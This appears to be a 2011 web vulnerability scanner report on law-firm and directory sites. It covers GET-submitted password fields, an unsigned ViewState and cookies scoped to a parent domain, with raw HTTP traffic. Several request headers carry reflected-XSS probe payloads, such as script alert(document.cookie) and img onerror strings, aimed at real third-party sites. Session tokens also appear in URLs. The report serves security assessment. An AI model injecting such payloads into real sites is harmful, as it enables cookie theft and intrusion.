<title>Arnold & Porter LLP</title> <meta name="Description" content="Arnold & ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=AntonipillaiJustinS&action=view&id=420&CFID=9488352&CFTOKEN=58883300">Justin Antonipillai</a> ...[SNIP]... </em> ranked Arnold & Porter as a leading law firm for International Arbitration and Capital Markets. The publication also ranked the following lawyers as "Leading Individuals": <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=9488352&CFTOKEN=58883300">Paolo Di Rosa</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=9488352&CFTOKEN=58883300">Gaela Gehring Flores</a> for International Arbitration; <a href="http://www.arnoldporter.com/professionals.cfm?u=HarringtonGregory&action=view&id=946&CFID=9488352&CFTOKEN=58883300">Gregory Harrington</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=StumpfMarkH&action=view&id=116&CFID=9488352&CFTOKEN=58883300">Mark Stumpf</a> ...[SNIP]... </em> named Arnold & Porter antitrust partner <a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&action=view&id=29&CFID=3285218&CFTOKEN=60209382">Deborah Feinstein</a> ...[SNIP]... </em> annual Awards Ceremony in London on June 22nd. The team, led by London partners <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=2238313&CFTOKEN=85690966">Tim Frazer</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=HinchliffeSusan&action=view&id=234&CFID=2238313&CFTOKEN=85690966">Susan Hinchliffe</a> ...[SNIP]... <p>Attorney General Eric Holder presented Arnold & Porter counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=PitofskyRobert&action=view&id=424&CFID=1875550&CFTOKEN=71164531">Robert Pitofsky</a> ...[SNIP]... 
</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=DregerGingerR&action=view&id=5423&CFID=476026&CFTOKEN=73240865">Ginger Dreger</a> ...[SNIP]... </em> named Arnold & Porter partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=417833&CFTOKEN=96803455">William Baer</a> ...[SNIP]... </a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=RubelEricA&action=view&id=96&CFID=15574942&CFTOKEN=53050326">Eric Rubel</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=8038589&CFTOKEN=38448975">William Baer</a> ...[SNIP]... </a> the "Washington, DC Bankruptcy and Creditor-Debtor Rights Lawyer of the Year"; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&action=view&id=189&CFID=8038589&CFTOKEN=38448975">Michael Gerrard</a> the "New York Environmental Lawyer of the Year" and <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=8038589&CFTOKEN=38448975">John D. Hawke Jr.</a> ...[SNIP]... ife sciences: regulatory, compliance & competition; and product liability: mainly defendant; and was ranked as a "Leading Firm" for intellectual property and media & entertainment: publishing. <a href="http://www.arnoldporter.com/professionals.cfm?u=DoddsSmithIan&action=view&id=457&CFID=8038589&CFTOKEN=38448975">Ian Dodds-Smith</a> ...[SNIP]... </a> was ranked for life sciences and product liability; <a href="http://www.arnoldporter.com/professionals.cfm?u=TsangLincoln&action=view&id=553&CFID=8038589&CFTOKEN=38448975">Lincoln Tsang</a> was ranked for life sciences; <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=8038589&CFTOKEN=38448975">Ian Kirby</a> ...[SNIP]... 
</a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=DriverHElizabeth&action=view&id=435&CFID=8038589&CFTOKEN=38448975">Elizabeth Driver</a>, and <a href="http://www.arnoldporter.com/professionals.cfm?u=BoreJacqueline&action=view&id=799&CFID=8038589&CFTOKEN=38448975">Jacqueline Bore</a> were ranked for product liability; <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=8038589&CFTOKEN=38448975">Tim Frazer</a> was ranked for competition/European Law; <a href="http://www.arnoldporter.com/professionals.cfm?u=ClintonDavisHenry&action=view&id=5083&CFID=8038589&CFTOKEN=38448975">Henry Clinton-Davis</a> was ranked for employment; and <a href="http://www.arnoldporter.com/professionals.cfm?u=WillcocksJeremy&action=view&id=378&CFID=8038589&CFTOKEN=38448975">Jeremy Willcocks</a> ...[SNIP]... </em> In terms of practice areas, the group certainly enjoys a diverse caseload, although it is in the field of investment arbitration that it earns the most significant praise." The publication named <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=793238&CFTOKEN=19009463">Paolo Di Rosa</a> as a "Leading Individual" for International Arbitration and also singled out <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=793238&CFTOKEN=19009463">Gaela Gehring Flores</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=KalickiJeanEngelmayer&action=view&id=254&CFID=793238&CFTOKEN=19009463">Jean Kalicki</a> ...[SNIP]... </em> 2009 named firm Chair <a href="http://www.arnoldporter.com/professionals.cfm?u=MilchThomasH&action=view&id=79&CFID=793238&CFTOKEN=19009463">Thomas Milch</a> and senior counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&action=view&id=189&CFID=793238&CFTOKEN=19009463">Michael Gerrard</a> on its "Most Highly Regarded Individuals - Global" list. 
Arnold & Porter was the only firm to have two individuals ranked on the list of ten international lawyers. Partners <a href="http://www.arnoldporter.com/professionals.cfm?u=BilesBlakeA&action=view&id=8&CFID=793238&CFTOKEN=19009463">Blake Biles</a> ...[SNIP]... </a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=MartelJonathan&action=view&id=74&CFID=793238&CFTOKEN=19009463">Jonathan Martel</a>, <a href="http://www.arnoldporter.com/professionals.cfm?u=NardiKarenJ&action=view&id=5263&CFID=793238&CFTOKEN=19009463">Karen Nardi</a>, and <a href="http://www.arnoldporter.com/professionals.cfm?u=NorrisTrentonH&action=view&id=5056&CFID=793238&CFTOKEN=19009463">Trenton Norris</a> ...[SNIP]... ual property, media and entertainment, and pharmaceuticals and biotechnology); and transport (rail). The firm was also ranked as a "US firm in London" for Dual US/UK law capability: 25-50 fee-earners. <a href="http://www.arnoldporter.com/professionals.cfm?u=DoddsSmithIan&action=view&id=457&CFID=793238&CFTOKEN=19009463">Ian Dodds-Smith</a> was named a "leading individual" for product liability and pharmaceuticals & biotechnology; and <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=793238&CFTOKEN=19009463">Ian Kirby</a> ...[SNIP]... </em> "Top Washington Lawyers" feature, published in its September 18-24, 2009 edition. <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=793238&CFTOKEN=19009463">Gaela Gehring Flores</a> ...[SNIP]... </a>; <a href="http://www.arnoldporter.com/professionals.cfm?u=KahnSarahE&action=view&id=99&CFID=793238&CFTOKEN=19009463">Sarah Kahn</a> was named a winner for Corporate M&A; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerschDavidP&action=view&id=37&CFID=793238&CFTOKEN=19009463">David Gersch</a> ...[SNIP]... 
</a> was named a winner for Technology Transactions; <a href="http://www.arnoldporter.com/professionals.cfm?u=RifkindAmyB&action=view&id=231&CFID=793238&CFTOKEN=19009463">Amy Rifkind</a> was named as a winner for Real Estate Transactions; and <a href="http://www.arnoldporter.com/professionals.cfm?u=SotskyLester&action=view&id=111&CFID=793238&CFTOKEN=19009463">Les Sotsky</a> ...[SNIP]... <p><a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&action=view&id=29&CFID=793238&CFTOKEN=19009463">Deborah Feinstein</a> ...[SNIP]... </a> (Brussels) and <a href="http://www.arnoldporter.com/professionals.cfm?u=VanKerckhoveMarleen&action=view&id=616&CFID=793238&CFTOKEN=19009463">Marleen Van Kerckhove</a> ...[SNIP]... <p>The New York City Bar Association's (NYCBA) has named <a href="http://www.arnoldporter.com/professionals.cfm?u=FucciFrederickR&action=view&id=4980&CFID=793238&CFTOKEN=19009463">Frederick R. Fucci</a> ...[SNIP]... </em> 2009 list: <a href="http://www.arnoldporter.com/professionals.cfm?u=GargantaAngelA&action=view&id=5055&CFID=793238&CFTOKEN=19009463">Angel Garganta</a> (business litigation, civil litigation defense, and banking), <a href="http://www.arnoldporter.com/professionals.cfm?u=NardiKarenJ&action=view&id=5263&CFID=793238&CFTOKEN=19009463">Karen Nardi</a> (environmental), <a href="http://www.arnoldporter.com/professionals.cfm?u=NorrisTrentonH&action=view&id=5056&CFID=793238&CFTOKEN=19009463">Trenton Norris</a> ...[SNIP]... </a> (intellectual property litigation, civil rights/first amendment, and alternative dispute resolution). <a href="http://www.arnoldporter.com/professionals.cfm?u=ChaninRachelL&action=view&id=5095&CFID=793238&CFTOKEN=19009463">Rachel Chanin</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=793238&CFTOKEN=19009463">John D. Hawke, Jr.</a> ...[SNIP]... 
<p>The Internal Revenue Service's Advisory Committee on Tax Exempt and Government Entities (ACT) named <a href="http://www.arnoldporter.com/professionals.cfm?u=JosephJamesP&action=view&id=53&CFID=793238&CFTOKEN=19009463">James Joseph</a> ...[SNIP]... p>Arnold & Porter was recommended in England for IP: commercial IP and IP: non-patent litigation; was recommended in Washington, DC for IP; and was recognized in England for IP: patent litigation. <a href="http://www.arnoldporter.com/professionals.cfm?u=DickinsonRichard&action=view&id=5050&CFID=793238&CFTOKEN=19009463">Richard Dickinson</a> was recognized for IP: commercial IP (England); <a href="http://www.arnoldporter.com/professionals.cfm?u=KirbyIan&action=view&id=320&CFID=793238&CFTOKEN=19009463">Ian Kirby</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=JohnstonRonaldL&action=view&id=306&CFID=793238&CFTOKEN=19009463">Ronald Johnston</a> ...[SNIP]... <p>The National Asian Pacific American Bar Association (NAPABA) named San Francisco partner <a href="http://www.arnoldporter.com/professionals.cfm?u=AgarwalMonty&action=view&id=5058&CFID=793238&CFTOKEN=19009463">Monty Agarwal</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=MorrisSean&action=view&id=263&CFID=793238&CFTOKEN=19009463">Sean Morris</a> ...[SNIP]... <p>The Executive Council of the Banking Law Committee of the Federal Bar Association awarded <a href="http://www.arnoldporter.com/attorneys.cfm?u=HawkeJohnDJr&action=view&id=716&CFID=6662351&CFTOKEN=25960794">John D. Hawke, Jr.</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=ColleyMarkD&action=view&id=913&CFID=793238&CFTOKEN=19009463">Mark Colley</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=GoodwinMichaelD&action=view&id=163&CFID=793238&CFTOKEN=19009463">Michael Goodwin</a> ...[SNIP]... 
</em>awarded partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&action=view&id=289&CFID=793238&CFTOKEN=19009463">William Baer</a> ...[SNIP]... </em>named <a href="http://www.arnoldporter.com/professionals.cfm?u=GarrettRobertAlan&action=view&id=36&CFID=793238&CFTOKEN=19009463">Robert Garrett</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BlackburnJamesS&action=view&id=301&CFID=793238&CFTOKEN=19009463">James Blackburn</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=MacdonaldTimothyR&action=view&id=279&CFID=793238&CFTOKEN=19009463">Timothy Macdonald</a> ...[SNIP]... </em> named <a href="http://www.arnoldporter.com/attorneys.cfm?u=QuinnJohnJ&action=view&id=225&CFID=6160598&CFTOKEN=81825356">John "Jack" Quinn</a> ...[SNIP]...
7. Password field submitted using GET method
There are 5 instances of this issue:
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start login --> <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input class="" id="passwordinput" name="password" type="password"> <div id="cnnConnectLoginErrors" style="display: none;"> ...[SNIP]...
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start reset password --> <form id="cnnConnectFormReset" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input type="password" id="new_password" name="newPassword"> <div id="cnnConnectResetErrors"> ...[SNIP]...
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start registration --> <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input id="signup_password" name="password" maxlength="10" type="password" /> <span class="fieldTip"> ...[SNIP]...
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.local.com/results.aspx
The form contains the following password field:
password
Request
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.vault.com/wps/portal/usa/membership
The form contains the following password fields:
UserPassword
UserConfirm
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The ViewState is a mechanism built into the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.cov.com/zh-CN/offices/office.aspx?office=64">here</a>.</h2> </body></html>
<!DOCTYPE HTML PUBLIC "-/ ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM2OTAxODQ2ZGQ=" /> ...[SNIP]...
9. Cookie scoped to parent domain
There are 42 instances of this issue:
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw HTTP/1.1 Host: wsdsapi.infospace.com Proxy-Connection: keep-alive Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dc HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFTOKEN=35971701;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A41%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A40%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6035991&rn=57307763&c7=http%3A%2F%2Fwww.yellowpages.com%2FWashington-DC74302%253Cimg%2520src%253da%2520onerror%253dalert(1)%253E9c7a66be0e0%2FAttorneys&c8=No%20Location%20Found%20-%20YP.com&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Wed, 19 Jan 2011 15:26:51 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 18-Jan-2013 15:26:51 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /OzoDB/cutils/R52_5/jsc/933/egc.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 6 Content-Type: application/x-javascript Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com; P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2608430956 Cache-Control: max-age=2007212 Expires: Fri, 11 Feb 2011 23:40:50 GMT Date: Wed, 19 Jan 2011 18:07:18 GMT Connection: close
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fm.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 911 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0daa-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=285 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:14 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com;
FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=301 Expires: Wed, 19 Jan 2011 15:55:44 GMT Date: Wed, 19 Jan 2011 15:50:43 GMT Connection: close Content-Length: 2277
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]...
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
